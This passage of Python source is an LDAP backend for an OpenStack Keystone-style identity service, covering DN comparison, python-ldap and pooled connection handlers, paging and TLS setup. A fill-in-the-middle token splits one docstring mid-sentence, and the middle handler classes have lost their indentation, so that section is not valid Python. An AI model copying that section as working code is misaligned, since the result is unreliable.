      AVA in an RDN, otherwise the DN wouldn't be valid.
    * Attribute types aren't case sensitive. Note that attribute type
      comparison is more complicated than implemented. This function only
      compares case-insentive. The code should handle multiple names for an
      attribute type (e.g., cn, commonName, and 2.5.4.3 are the same).

    Note that this function uses is_ava_value_equal to compare AVAs so the
    limitations of that function apply here.
    """
    if len(rdn1) != len(rdn2):
        return False
    # Every AVA of rdn1 must match an AVA of rdn2 with the same
    # (case-insensitively compared) attribute type.
    for attr_type_1, val1, dummy in rdn1:
        found = False
        for attr_type_2, val2, dummy in rdn2:
            if attr_type_1.lower() != attr_type_2.lower():
                continue
            found = True
            if not is_ava_value_equal(attr_type_1, val1, val2):
                return False
            # The third element of each AVA tuple is ignored here.
            break
        if not found:
            return False
    return True
def is_dn_equal(dn1, dn2):
    """Returns True if and only if the DNs are equal.

    Two DNs are equal if they've got the same number of RDNs and if the RDNs
    are the same at each position. See RFC4517.

    Note that this function uses is_rdn_equal to compare RDNs so the
    limitations of that function apply here.

    :param dn1: Either a string DN or a DN parsed by ldap.dn.str2dn.
    :param dn2: Either a string DN or a DN parsed by ldap.dn.str2dn.
    """
    # Accept both string and pre-parsed forms; strings are parsed here
    # (after UTF-8 encoding, as python-ldap requires).
    if not isinstance(dn1, list):
        dn1 = ldap.dn.str2dn(utf8_encode(dn1))
    if not isinstance(dn2, list):
        dn2 = ldap.dn.str2dn(utf8_encode(dn2))
    if len(dn1) != len(dn2):
        return False
    # Compare RDNs positionally.
    for rdn1, rdn2 in zip(dn1, dn2):
        if not is_rdn_equal(rdn1, rdn2):
            return False
    return True
def dn_startswith(descendant_dn, dn):
    """Returns True if and only if the descendant_dn is under the dn.

    :param descendant_dn: Either a string DN or a DN parsed by ldap.dn.str2dn.
    :param dn: Either a string DN or a DN parsed by ldap.dn.str2dn.
    """
    if not isinstance(descendant_dn, list):
        descendant_dn = ldap.dn.str2dn(utf8_encode(descendant_dn))
    if not isinstance(dn, list):
        dn = ldap.dn.str2dn(utf8_encode(dn))
    # A descendant must be strictly longer than its ancestor.
    if len(descendant_dn) <= len(dn):
        return False
    # Use the last len(dn) RDNs.
    return is_dn_equal(descendant_dn[-len(dn):], dn)
@six.add_metaclass(abc.ABCMeta)
class LDAPHandler(object):
'''Abstract class which defines methods for a LDAP API provider.
Native Keystone values cannot be passed directly into and from the
python-ldap API. Type conversion must occur at the LDAP API
boudary, examples of type conversions are:
* booleans map to the strings 'TRUE' and 'FALSE'
* integer values map to their string representation.
* unicode strings are encoded in UTF-8
In addition to handling type conversions at the API boundary we
have the requirement to support more than one LDAP API
provider. Currently we have:
* python-ldap, this is the standard LDAP API for Python, it
requires access to a live LDAP server.
* Fake LDAP which emulates python-ldap. This is used for
testing without requiring a live LDAP server.
To support these requirements we need a layer that performs type
conversions and then calls another LDAP API which is configurable
(e.g. either python-ldap or the fake emulation).
We have an additional constraint at the time of this writing due to
limitations in the logging module. The logging module is not
capable of accepting UTF-8 encoded strings, it will throw an
encoding exception. Therefore all logging MUST be performed prior
to UTF-8 conversion. This means no logging can be performed in the
ldap APIs that implement the python-ldap API because those APIs
are defined to accept only UTF-8 strings. Thus the layer which
performs type conversions must also do the logging. We do the type
conversions in two steps, once to convert all Python types to
unicode strings, then log, then convert the unicode strings to
UTF-8.
There are a variety of ways one could accomplish this, we elect to
use a chaining technique whereby instances of this class simply
call the next member in the chain via the "conn" attribute. The
chain is constructed by passing in an existing instance of this
class as the conn attribute when the class is instantiated.
Here is a brief explanation of why other possible approaches were
not used:
subclassing
To perform the wrapping operations in the correct order
the type convesion class would have to subclass each of
the API providers. This is awkward, doubles the number of
classes, and does not scale well. It requires the type
conversion class to be aware of all possible API
providers.
decorators
Decorators provide an elegant solution to wrap methods and
would be an ideal way to perform type conversions before
calling the wrapped function and then converting the
values returned from the wrapped function. However
decorators need to be aware of the method signature, it
has to know what input parameters need conversion and how
to convert the result. For an API like python-ldap which
has a large number of different method signatures it would
require a large number of specialized<|fim▁hole|> the wrong decorator due to the inherent complexity and
tendency to cut-n-paste code. Another option is to
parameterize the decorator to make it "smart". Experience
has shown such decorators become insanely complicated and
difficult to understand and debug. Also decorators tend to
hide what's really going on when a method is called, the
operations being performed are not visible when looking at
the implemation of a decorated method, this too experience
has shown leads to mistakes.
Chaining simplifies both wrapping to perform type conversion as
well as the substitution of alternative API providers. One simply
creates a new instance of the API interface and insert it at the
front of the chain. Type conversions are explicit and obvious.
If a new method needs to be added to the API interface one adds it
to the abstract class definition. Should one miss adding the new
method to any derivations of the abstract class the code will fail
to load and run making it impossible to forget updating all the
derived classes.
'''
@abc.abstractmethod
def __init__(self, conn=None):
self.conn = conn
@abc.abstractmethod
def connect(self, url, page_size=0, alias_dereferencing=None,
use_tls=False, tls_cacertfile=None, tls_cacertdir=None,
tls_req_cert='demand', chase_referrals=None, debug_level=None,
use_pool=None, pool_size=None, pool_retry_max=None,
pool_retry_delay=None, pool_conn_timeout=None,
pool_conn_lifetime=None):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def set_option(self, option, invalue):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def get_option(self, option):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def simple_bind_s(self, who='', cred='',
serverctrls=None, clientctrls=None):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def unbind_s(self):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def add_s(self, dn, modlist):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def search_s(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def search_ext(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0,
serverctrls=None, clientctrls=None,
timeout=-1, sizelimit=0):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def result3(self, msgid=ldap.RES_ANY, all=1, timeout=None,
resp_ctrl_classes=None):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def modify_s(self, dn, modlist):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def delete_s(self, dn):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def delete_ext_s(self, dn, serverctrls=None, clientctrls=None):
raise exception.NotImplemented() # pragma: no cover
class PythonLDAPHandler(LDAPHandler):
'''Implementation of the LDAPHandler interface which calls the
python-ldap API.
Note, the python-ldap API requires all string values to be UTF-8
encoded. The KeystoneLDAPHandler enforces this prior to invoking
the methods in this class.
'''
def __init__(self, conn=None):
super(PythonLDAPHandler, self).__init__(conn=conn)
def connect(self, url, page_size=0, alias_dereferencing=None,
use_tls=False, tls_cacertfile=None, tls_cacertdir=None,
tls_req_cert='demand', chase_referrals=None, debug_level=None,
use_pool=None, pool_size=None, pool_retry_max=None,
pool_retry_delay=None, pool_conn_timeout=None,
pool_conn_lifetime=None):
_common_ldap_initialization(url=url,
use_tls=use_tls,
tls_cacertfile=tls_cacertfile,
tls_cacertdir=tls_cacertdir,
tls_req_cert=tls_req_cert,
debug_level=debug_level)
self.conn = ldap.initialize(url)
self.conn.protocol_version = ldap.VERSION3
if alias_dereferencing is not None:
self.conn.set_option(ldap.OPT_DEREF, alias_dereferencing)
self.page_size = page_size
if use_tls:
self.conn.start_tls_s()
if chase_referrals is not None:
self.conn.set_option(ldap.OPT_REFERRALS, int(chase_referrals))
def set_option(self, option, invalue):
return self.conn.set_option(option, invalue)
def get_option(self, option):
return self.conn.get_option(option)
def simple_bind_s(self, who='', cred='',
serverctrls=None, clientctrls=None):
return self.conn.simple_bind_s(who, cred, serverctrls, clientctrls)
def unbind_s(self):
return self.conn.unbind_s()
def add_s(self, dn, modlist):
return self.conn.add_s(dn, modlist)
def search_s(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0):
return self.conn.search_s(base, scope, filterstr,
attrlist, attrsonly)
def search_ext(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0,
serverctrls=None, clientctrls=None,
timeout=-1, sizelimit=0):
return self.conn.search_ext(base, scope,
filterstr, attrlist, attrsonly,
serverctrls, clientctrls,
timeout, sizelimit)
def result3(self, msgid=ldap.RES_ANY, all=1, timeout=None,
resp_ctrl_classes=None):
# The resp_ctrl_classes parameter is a recent addition to the
# API. It defaults to None. We do not anticipate using it.
# To run with older versions of python-ldap we do not pass it.
return self.conn.result3(msgid, all, timeout)
def modify_s(self, dn, modlist):
return self.conn.modify_s(dn, modlist)
def delete_s(self, dn):
return self.conn.delete_s(dn)
    def delete_ext_s(self, dn, serverctrls=None, clientctrls=None):
        # Extended delete; server controls allow e.g. subtree delete.
        return self.conn.delete_ext_s(dn, serverctrls, clientctrls)
def _common_ldap_initialization(url, use_tls=False, tls_cacertfile=None,
                                tls_cacertdir=None, tls_req_cert=None,
                                debug_level=None):
    '''Method for common ldap initialization between PythonLDAPHandler and
    PooledLDAPHandler.

    Validates the TLS configuration and applies it. NOTE: the TLS and debug
    options below are set *globally* on the ldap module, not per-connection,
    so they affect every connection in this process.
    '''
    LOG.debug("LDAP init: url=%s", url)
    LOG.debug('LDAP init: use_tls=%s tls_cacertfile=%s tls_cacertdir=%s '
              'tls_req_cert=%s tls_avail=%s',
              use_tls, tls_cacertfile, tls_cacertdir,
              tls_req_cert, ldap.TLS_AVAIL)
    if debug_level is not None:
        ldap.set_option(ldap.OPT_DEBUG_LEVEL, debug_level)
    using_ldaps = url.lower().startswith("ldaps")
    # StartTLS on an ldaps:// URL makes no sense: the socket is already TLS.
    if use_tls and using_ldaps:
        raise AssertionError(_('Invalid TLS / LDAPS combination'))
    # The certificate trust options apply for both LDAPS and TLS.
    if use_tls or using_ldaps:
        if not ldap.TLS_AVAIL:
            raise ValueError(_('Invalid LDAP TLS_AVAIL option: %s. TLS '
                               'not available') % ldap.TLS_AVAIL)
        if tls_cacertfile:
            # NOTE(topol)
            # python ldap TLS does not verify CACERTFILE or CACERTDIR
            # so we add some extra simple sanity check verification
            # Also, setting these values globally (i.e. on the ldap object)
            # works but these values are ignored when setting them on the
            # connection
            if not os.path.isfile(tls_cacertfile):
                raise IOError(_("tls_cacertfile %s not found "
                                "or is not a file") %
                              tls_cacertfile)
            ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, tls_cacertfile)
        elif tls_cacertdir:
            # NOTE(topol)
            # python ldap TLS does not verify CACERTFILE or CACERTDIR
            # so we add some extra simple sanity check verification
            # Also, setting these values globally (i.e. on the ldap object)
            # works but these values are ignored when setting them on the
            # connection
            if not os.path.isdir(tls_cacertdir):
                raise IOError(_("tls_cacertdir %s not found "
                                "or is not a directory") %
                              tls_cacertdir)
            ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, tls_cacertdir)
        # tls_req_cert arrives already mapped to an ldap.OPT_X_TLS_* value
        # (see LDAP_TLS_CERTS); anything else is logged and ignored.
        if tls_req_cert in LDAP_TLS_CERTS.values():
            ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, tls_req_cert)
        else:
            LOG.debug("LDAP TLS: invalid TLS_REQUIRE_CERT Option=%s",
                      tls_req_cert)
class MsgId(list):
    '''Pair of (connection, message id) for an in-flight async search.

    Subclasses ``list`` so callers can unpack it like a plain sequence,
    while still being weak-referenceable (plain tuples are not), which is
    how the pooled handler releases the connection once the result handle
    is garbage collected.
    '''
def use_conn_pool(func):
    '''Use this only for connection pool specific ldap API.

    This adds connection object to decorated API as next argument after self.
    '''
    # functools.wraps preserves the wrapped method's __name__/__doc__ so
    # logging and introspection report the real API name, not 'wrapper'.
    # (functools is already imported at module level; see its use in
    # PooledLDAPHandler.search_ext.)
    @functools.wraps(func)
    def wrapper(self, *args, **kwargs):
        # Borrow a pooled connection for the duration of the call; the
        # context manager returns it to the pool when the call finishes.
        with self._get_pool_connection() as conn:
            self._apply_options(conn)
            return func(self, conn, *args, **kwargs)
    return wrapper
class PooledLDAPHandler(LDAPHandler):
    '''Implementation of the LDAPHandler interface which uses pooled
    connection manager.

    Pool specific configuration is defined in [ldap] section.
    All other LDAP configuration is still used from [ldap] section

    Keystone LDAP authentication logic authenticates an end user using its DN
    and password via LDAP bind to establish supplied password is correct.
    This can fill up the pool quickly (as pool re-uses existing connection
    based on its bind data) and would not leave space in pool for connection
    re-use for other LDAP operations.
    Now a separate pool can be established for those requests when related flag
    'use_auth_pool' is enabled. That pool can have its own size and
    connection lifetime. Other pool attributes are shared between those pools.
    If 'use_pool' is disabled, then 'use_auth_pool' does not matter.
    If 'use_auth_pool' is not enabled, then connection pooling is not used for
    those LDAP operations.

    Note, the python-ldap API requires all string values to be UTF-8
    encoded. The KeystoneLDAPHandler enforces this prior to invoking
    the methods in this class.
    '''
    # Added here to allow override for testing
    Connector = ldappool.StateConnector
    auth_pool_prefix = 'auth_pool_'
    # Class-level (process-wide) cache of connection pools, keyed by URL.
    # NOTE(review): access is not locked; concurrent first use of the same
    # URL may briefly create two pools, with one becoming garbage — verify
    # this is acceptable for the deployment's threading model.
    connection_pools = {}  # static connector pool dict
    def __init__(self, conn=None, use_auth_pool=False):
        super(PooledLDAPHandler, self).__init__(conn=conn)
        # Bind identity used when acquiring connections from the pool.
        self.who = ''
        self.cred = ''
        self.conn_options = {}  # connection specific options
        self.page_size = None
        self.use_auth_pool = use_auth_pool
        self.conn_pool = None
    def connect(self, url, page_size=0, alias_dereferencing=None,
                use_tls=False, tls_cacertfile=None, tls_cacertdir=None,
                tls_req_cert='demand', chase_referrals=None, debug_level=None,
                use_pool=None, pool_size=None, pool_retry_max=None,
                pool_retry_delay=None, pool_conn_timeout=None,
                pool_conn_lifetime=None):
        # Apply the process-global TLS/debug setup, then locate (or lazily
        # create) the pool for this URL.
        _common_ldap_initialization(url=url,
                                    use_tls=use_tls,
                                    tls_cacertfile=tls_cacertfile,
                                    tls_cacertdir=tls_cacertdir,
                                    tls_req_cert=tls_req_cert,
                                    debug_level=debug_level)
        self.page_size = page_size
        # Following two options are not added in common initialization as they
        # need to follow a sequence in PythonLDAPHandler code.
        if alias_dereferencing is not None:
            self.set_option(ldap.OPT_DEREF, alias_dereferencing)
        if chase_referrals is not None:
            self.set_option(ldap.OPT_REFERRALS, int(chase_referrals))
        if self.use_auth_pool:  # separate pool when use_auth_pool enabled
            pool_url = self.auth_pool_prefix + url
        else:
            pool_url = url
        try:
            self.conn_pool = self.connection_pools[pool_url]
        except KeyError:
            self.conn_pool = ldappool.ConnectionManager(
                url,
                size=pool_size,
                retry_max=pool_retry_max,
                retry_delay=pool_retry_delay,
                timeout=pool_conn_timeout,
                connector_cls=self.Connector,
                use_tls=use_tls,
                max_lifetime=pool_conn_lifetime)
            self.connection_pools[pool_url] = self.conn_pool
    def set_option(self, option, invalue):
        # Options are recorded locally and replayed onto each pooled
        # connection by _apply_options(), not set on a live connection here.
        self.conn_options[option] = invalue
    def get_option(self, option):
        value = self.conn_options.get(option)
        # if option was not specified explicitly, then use connection default
        # value for that option if there.
        if value is None:
            with self._get_pool_connection() as conn:
                value = conn.get_option(option)
        return value
    def _apply_options(self, conn):
        # if connection has a lifetime, then it already has options specified
        # NOTE(review): the threshold 30 appears to be a heuristic for "this
        # connection has been alive long enough to have been configured" —
        # confirm against ldappool's get_lifetime() semantics.
        if conn.get_lifetime() > 30:
            return
        for option, invalue in six.iteritems(self.conn_options):
            conn.set_option(option, invalue)
    def _get_pool_connection(self):
        # Context manager yielding a connection bound as (self.who, self.cred).
        return self.conn_pool.connection(self.who, self.cred)
    def simple_bind_s(self, who='', cred='',
                      serverctrls=None, clientctrls=None):
        '''Not using use_conn_pool decorator here as this API takes cred as
        input.
        '''
        # Record the bind identity; the pool performs the actual bind when a
        # connection is acquired, so entering the context validates the
        # credentials as a side effect.
        self.who = who
        self.cred = cred
        with self._get_pool_connection() as conn:
            self._apply_options(conn)
    def unbind_s(self):
        # After connection generator is done `with` statement execution block
        # connection is always released via finally block in ldappool.
        # So this unbind is a no op.
        pass
    @use_conn_pool
    def add_s(self, conn, dn, modlist):
        return conn.add_s(dn, modlist)
    @use_conn_pool
    def search_s(self, conn, base, scope,
                 filterstr='(objectClass=*)', attrlist=None, attrsonly=0):
        return conn.search_s(base, scope, filterstr, attrlist,
                             attrsonly)
    def search_ext(self, base, scope,
                   filterstr='(objectClass=*)', attrlist=None, attrsonly=0,
                   serverctrls=None, clientctrls=None,
                   timeout=-1, sizelimit=0):
        '''This API is an asynchronous API which returns MsgId instance to be
        used in result3 call.

        To work with result3 API in predictable manner, same LDAP connection
        is needed which provided msgid. So wrapping used connection and msgid
        in MsgId class. The connection associated with search_ext is released
        once last hard reference to MsgId object is freed. This will happen
        when the method is done with returned MsgId usage.
        '''
        # Enter the pool context manually (not via `with`) so the connection
        # stays checked out until the MsgId result handle is garbage
        # collected; the weakref callback below performs the __exit__.
        conn_ctxt = self._get_pool_connection()
        conn = conn_ctxt.__enter__()
        try:
            msgid = conn.search_ext(base, scope,
                                    filterstr, attrlist, attrsonly,
                                    serverctrls, clientctrls,
                                    timeout, sizelimit)
        except Exception:
            conn_ctxt.__exit__(*sys.exc_info())
            raise
        res = MsgId((conn, msgid))
        weakref.ref(res, functools.partial(conn_ctxt.__exit__,
                                           None, None, None))
        return res
    def result3(self, msgid, all=1, timeout=None,
                resp_ctrl_classes=None):
        '''This method is used to wait for and return the result of an
        operation previously initiated by one of the LDAP asynchronous
        operation routines (eg search_ext()) It returned an invocation
        identifier (a message id) upon successful initiation of their
        operation.

        Input msgid is expected to be instance of class MsgId which has LDAP
        session/connection used to execute search_ext and message identifier.

        The connection associated with search_ext is released once last hard
        reference to MsgId object is freed. This will happen when function
        which requested msgId and used it in result3 exits.
        '''
        conn, msg_id = msgid
        return conn.result3(msg_id, all, timeout)
    @use_conn_pool
    def modify_s(self, conn, dn, modlist):
        return conn.modify_s(dn, modlist)
    @use_conn_pool
    def delete_s(self, conn, dn):
        return conn.delete_s(dn)
    @use_conn_pool
    def delete_ext_s(self, conn, dn, serverctrls=None, clientctrls=None):
        return conn.delete_ext_s(dn, serverctrls, clientctrls)
class KeystoneLDAPHandler(LDAPHandler):
    '''Convert data types and perform logging.

    This LDAP interface wraps the python-ldap based interfaces. The
    python-ldap interfaces require string values encoded in UTF-8. The
    OpenStack logging framework at the time of this writing is not
    capable of accepting strings encoded in UTF-8, the log functions
    will throw decoding errors if a non-ascii character appears in a
    string.

    Prior to the call Python data types are converted to a string
    representation as required by the LDAP APIs.

    Then logging is performed so we can track what is being
    sent/received from LDAP. Also the logging filters security
    sensitive items (i.e. passwords).

    Then the string values are encoded into UTF-8.

    Then the LDAP API entry point is invoked.

    Data returned from the LDAP call is converted back from UTF-8
    encoded strings into the Python data type used internally in
    OpenStack.
    '''
    def __init__(self, conn=None):
        super(KeystoneLDAPHandler, self).__init__(conn=conn)
        # 0 disables paged searches; connect() may override this.
        self.page_size = 0
    def __enter__(self):
        # Supports `with handler:` usage; __exit__ below unbinds.
        return self
    def _disable_paging(self):
        # Disable the pagination from now on
        self.page_size = 0
    def connect(self, url, page_size=0, alias_dereferencing=None,
                use_tls=False, tls_cacertfile=None, tls_cacertdir=None,
                tls_req_cert='demand', chase_referrals=None, debug_level=None,
                use_pool=None, pool_size=None,
                pool_retry_max=None, pool_retry_delay=None,
                pool_conn_timeout=None, pool_conn_lifetime=None):
        # Remember the page size locally (used by search_s) and delegate the
        # actual connection setup to the wrapped handler.
        self.page_size = page_size
        return self.conn.connect(url, page_size, alias_dereferencing,
                                 use_tls, tls_cacertfile, tls_cacertdir,
                                 tls_req_cert, chase_referrals,
                                 debug_level=debug_level,
                                 use_pool=use_pool,
                                 pool_size=pool_size,
                                 pool_retry_max=pool_retry_max,
                                 pool_retry_delay=pool_retry_delay,
                                 pool_conn_timeout=pool_conn_timeout,
                                 pool_conn_lifetime=pool_conn_lifetime)
    def set_option(self, option, invalue):
        return self.conn.set_option(option, invalue)
    def get_option(self, option):
        return self.conn.get_option(option)
    def simple_bind_s(self, who='', cred='',
                      serverctrls=None, clientctrls=None):
        # Log only the bind DN, never the credential.
        LOG.debug("LDAP bind: who=%s", who)
        who_utf8 = utf8_encode(who)
        cred_utf8 = utf8_encode(cred)
        return self.conn.simple_bind_s(who_utf8, cred_utf8,
                                       serverctrls=serverctrls,
                                       clientctrls=clientctrls)
    def unbind_s(self):
        LOG.debug("LDAP unbind")
        return self.conn.unbind_s()
    def add_s(self, dn, modlist):
        # Normalize values to LDAP string form, mask passwords in the log,
        # then UTF-8 encode everything before handing off to python-ldap.
        ldap_attrs = [(kind, [py2ldap(x) for x in safe_iter(values)])
                      for kind, values in modlist]
        logging_attrs = [(kind, values
                         if kind != 'userPassword'
                         else ['****'])
                         for kind, values in ldap_attrs]
        LOG.debug('LDAP add: dn=%s attrs=%s',
                  dn, logging_attrs)
        dn_utf8 = utf8_encode(dn)
        ldap_attrs_utf8 = [(kind, [utf8_encode(x) for x in safe_iter(values)])
                           for kind, values in ldap_attrs]
        return self.conn.add_s(dn_utf8, ldap_attrs_utf8)
    def search_s(self, base, scope,
                 filterstr='(objectClass=*)', attrlist=None, attrsonly=0):
        # NOTE(morganfainberg): Remove "None" singletons from this list, which
        # allows us to set mapped attributes to "None" as defaults in config.
        # Without this filtering, the ldap query would raise a TypeError since
        # attrlist is expected to be an iterable of strings.
        if attrlist is not None:
            attrlist = [attr for attr in attrlist if attr is not None]
        LOG.debug('LDAP search: base=%s scope=%s filterstr=%s '
                  'attrs=%s attrsonly=%s',
                  base, scope, filterstr, attrlist, attrsonly)
        if self.page_size:
            # Paged path handles its own encoding and result assembly.
            ldap_result = self._paged_search_s(base, scope,
                                               filterstr, attrlist)
        else:
            base_utf8 = utf8_encode(base)
            filterstr_utf8 = utf8_encode(filterstr)
            if attrlist is None:
                attrlist_utf8 = None
            else:
                attrlist_utf8 = map(utf8_encode, attrlist)
            ldap_result = self.conn.search_s(base_utf8, scope,
                                             filterstr_utf8,
                                             attrlist_utf8, attrsonly)
        # Decode raw UTF-8 LDAP results back to Python types.
        py_result = convert_ldap_result(ldap_result)
        return py_result
    def search_ext(self, base, scope,
                   filterstr='(objectClass=*)', attrlist=None, attrsonly=0,
                   serverctrls=None, clientctrls=None,
                   timeout=-1, sizelimit=0):
        # Same None-filtering rationale as search_s above.
        if attrlist is not None:
            attrlist = [attr for attr in attrlist if attr is not None]
        LOG.debug('LDAP search_ext: base=%s scope=%s filterstr=%s '
                  'attrs=%s attrsonly=%s'
                  'serverctrls=%s clientctrls=%s timeout=%s sizelimit=%s',
                  base, scope, filterstr, attrlist, attrsonly,
                  serverctrls, clientctrls, timeout, sizelimit)
        # NOTE(review): unlike search_s, arguments are not UTF-8 encoded
        # here before delegation — confirm callers pass pre-encoded values.
        return self.conn.search_ext(base, scope,
                                    filterstr, attrlist, attrsonly,
                                    serverctrls, clientctrls,
                                    timeout, sizelimit)
    def _paged_search_s(self, base, scope, filterstr, attrlist=None):
        # Accumulates all pages of a paged search into a single result list.
        res = []
        use_old_paging_api = False
        # The API for the simple paged results control changed between
        # python-ldap 2.3 and 2.4. We need to detect the capabilities
        # of the python-ldap version we are using.
        if hasattr(ldap, 'LDAP_CONTROL_PAGE_OID'):
            use_old_paging_api = True
            lc = ldap.controls.SimplePagedResultsControl(
                controlType=ldap.LDAP_CONTROL_PAGE_OID,
                criticality=True,
                controlValue=(self.page_size, ''))
            page_ctrl_oid = ldap.LDAP_CONTROL_PAGE_OID
        else:
            lc = ldap.controls.libldap.SimplePagedResultsControl(
                criticality=True,
                size=self.page_size,
                cookie='')
            page_ctrl_oid = ldap.controls.SimplePagedResultsControl.controlType
        base_utf8 = utf8_encode(base)
        filterstr_utf8 = utf8_encode(filterstr)
        if attrlist is None:
            attrlist_utf8 = None
        else:
            attrlist = [attr for attr in attrlist if attr is not None]
            attrlist_utf8 = map(utf8_encode, attrlist)
        msgid = self.conn.search_ext(base_utf8,
                                     scope,
                                     filterstr_utf8,
                                     attrlist_utf8,
                                     serverctrls=[lc])
        # Endless loop request pages on ldap server until it has no data
        while True:
            # Request to the ldap server a page with 'page_size' entries
            rtype, rdata, rmsgid, serverctrls = self.conn.result3(msgid)
            # Receive the data
            res.extend(rdata)
            pctrls = [c for c in serverctrls
                      if c.controlType == page_ctrl_oid]
            if pctrls:
                # LDAP server supports pagination
                if use_old_paging_api:
                    est, cookie = pctrls[0].controlValue
                    lc.controlValue = (self.page_size, cookie)
                else:
                    cookie = lc.cookie = pctrls[0].cookie
                if cookie:
                    # There is more data still on the server
                    # so we request another page
                    msgid = self.conn.search_ext(base_utf8,
                                                 scope,
                                                 filterstr_utf8,
                                                 attrlist_utf8,
                                                 serverctrls=[lc])
                else:
                    # Exit condition no more data on server
                    break
            else:
                LOG.warning(_LW('LDAP Server does not support paging. '
                                'Disable paging in keystone.conf to '
                                'avoid this message.'))
                self._disable_paging()
                break
        return res
    def result3(self, msgid=ldap.RES_ANY, all=1, timeout=None,
                resp_ctrl_classes=None):
        # Wait for an async operation, log the raw result, and decode it.
        ldap_result = self.conn.result3(msgid, all, timeout, resp_ctrl_classes)
        LOG.debug('LDAP result3: msgid=%s all=%s timeout=%s '
                  'resp_ctrl_classes=%s ldap_result=%s',
                  msgid, all, timeout, resp_ctrl_classes, ldap_result)
        py_result = convert_ldap_result(ldap_result)
        return py_result
    def modify_s(self, dn, modlist):
        # Same normalize / mask-password / encode pipeline as add_s, with
        # None preserved (meaning "delete all values" for MOD_DELETE).
        ldap_modlist = [
            (op, kind, (None if values is None
                        else [py2ldap(x) for x in safe_iter(values)]))
            for op, kind, values in modlist]
        logging_modlist = [(op, kind, (values if kind != 'userPassword'
                           else ['****']))
                           for op, kind, values in ldap_modlist]
        LOG.debug('LDAP modify: dn=%s modlist=%s',
                  dn, logging_modlist)
        dn_utf8 = utf8_encode(dn)
        ldap_modlist_utf8 = [
            (op, kind, (None if values is None
                        else [utf8_encode(x) for x in safe_iter(values)]))
            for op, kind, values in ldap_modlist]
        return self.conn.modify_s(dn_utf8, ldap_modlist_utf8)
    def delete_s(self, dn):
        LOG.debug("LDAP delete: dn=%s", dn)
        dn_utf8 = utf8_encode(dn)
        return self.conn.delete_s(dn_utf8)
    def delete_ext_s(self, dn, serverctrls=None, clientctrls=None):
        LOG.debug('LDAP delete_ext: dn=%s serverctrls=%s clientctrls=%s',
                  dn, serverctrls, clientctrls)
        dn_utf8 = utf8_encode(dn)
        return self.conn.delete_ext_s(dn_utf8, serverctrls, clientctrls)
    def __exit__(self, exc_type, exc_val, exc_tb):
        # Always release the LDAP session when leaving the `with` block.
        self.unbind_s()
_HANDLERS = {}
def register_handler(prefix, handler):
    # Register a custom handler class for connection URLs starting with
    # `prefix` (e.g. a fake in-memory backend for tests).
    _HANDLERS[prefix] = handler
def _get_connection(conn_url, use_pool=False, use_auth_pool=False):
    """Return an LDAPHandler implementation appropriate for *conn_url*.

    A registered handler whose URL prefix matches wins; otherwise fall back
    to the pooled or plain python-ldap implementation.
    """
    matched = next((handler
                    for prefix, handler in six.iteritems(_HANDLERS)
                    if conn_url.startswith(prefix)),
                   None)
    if matched is not None:
        return matched()
    if use_pool:
        return PooledLDAPHandler(use_auth_pool=use_auth_pool)
    return PythonLDAPHandler()
def filter_entity(entity_ref):
    """Filter out private items in an entity dict.

    :param entity_ref: the entity dictionary. The 'dn' field will be removed.
        'dn' is used in LDAP, but should not be returned to the user. This
        value may be modified.

    :returns: entity_ref
    """
    if entity_ref and 'dn' in entity_ref:
        del entity_ref['dn']
    return entity_ref
class BaseLdap(object):
    # Defaults used when the corresponding [ldap] config option is unset.
    DEFAULT_SUFFIX = "dc=example,dc=com"
    DEFAULT_OU = None
    DEFAULT_STRUCTURAL_CLASSES = None
    DEFAULT_ID_ATTR = 'cn'
    DEFAULT_OBJECTCLASS = None
    DEFAULT_FILTER = None
    DEFAULT_EXTRA_ATTR_MAPPING = []
    # Placeholder member some schemas require so a group is never empty.
    DUMB_MEMBER_DN = 'cn=dumb,dc=nonexistent'
    # Subclasses override these to bind the driver to a resource type:
    # NotFound: exception class raised on missing entries.
    # notfound_arg: kwarg name for that exception (defaults to
    #   '<options_name>_id').
    # options_name: config option prefix, e.g. 'user' or 'group'.
    # model: dict-like model class produced by _ldap_res_to_model().
    NotFound = None
    notfound_arg = None
    options_name = None
    model = None
    # model key -> config-suffix for per-attribute LDAP mapping options.
    attribute_options_names = {}
    # Attributes that may never be changed via update().
    immutable_attrs = []
    # Attributes dropped from reads and writes entirely.
    attribute_ignore = []
    # Base DN for this resource's subtree; set in __init__.
    tree_dn = None
    def __init__(self, conf):
        """Load all [ldap] configuration this driver needs from *conf*."""
        # Core connection settings.
        self.LDAP_URL = conf.ldap.url
        self.LDAP_USER = conf.ldap.user
        self.LDAP_PASSWORD = conf.ldap.password
        self.LDAP_SCOPE = ldap_scope(conf.ldap.query_scope)
        self.alias_dereferencing = parse_deref(conf.ldap.alias_dereferencing)
        self.page_size = conf.ldap.page_size
        # TLS settings.
        self.use_tls = conf.ldap.use_tls
        self.tls_cacertfile = conf.ldap.tls_cacertfile
        self.tls_cacertdir = conf.ldap.tls_cacertdir
        self.tls_req_cert = parse_tls_cert(conf.ldap.tls_req_cert)
        self.attribute_mapping = {}
        self.chase_referrals = conf.ldap.chase_referrals
        self.debug_level = conf.ldap.debug_level
        # LDAP Pool specific attribute
        self.use_pool = conf.ldap.use_pool
        self.pool_size = conf.ldap.pool_size
        self.pool_retry_max = conf.ldap.pool_retry_max
        self.pool_retry_delay = conf.ldap.pool_retry_delay
        self.pool_conn_timeout = conf.ldap.pool_connection_timeout
        self.pool_conn_lifetime = conf.ldap.pool_connection_lifetime
        # End user authentication pool specific config attributes
